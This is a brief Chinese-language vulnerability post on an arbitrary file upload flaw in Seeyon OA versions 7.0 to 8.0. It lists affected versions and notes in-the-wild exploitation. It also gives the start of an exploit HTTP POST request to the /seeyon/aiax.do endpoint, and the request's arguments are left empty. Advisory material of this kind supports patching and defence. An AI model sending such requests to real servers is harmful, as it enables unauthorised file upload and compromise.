致远OA任意文件上传漏洞

ytful / 2023-08-13 / 原文

漏洞编号

影响产品

致远 OA V8.0

致远OA V7.1、V7.1SP1

致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3

利用状态

在野利用(已公开poc)

漏洞详情

路径(需要普通用户权限)

POST /seeyon/aiax.do?method=aiaxAction&managerName=cipSynSchemeManager&requestCompress=gzip HTTP/1.1
Host: 1.1.1.1

managerMethod=copvFile&arguments=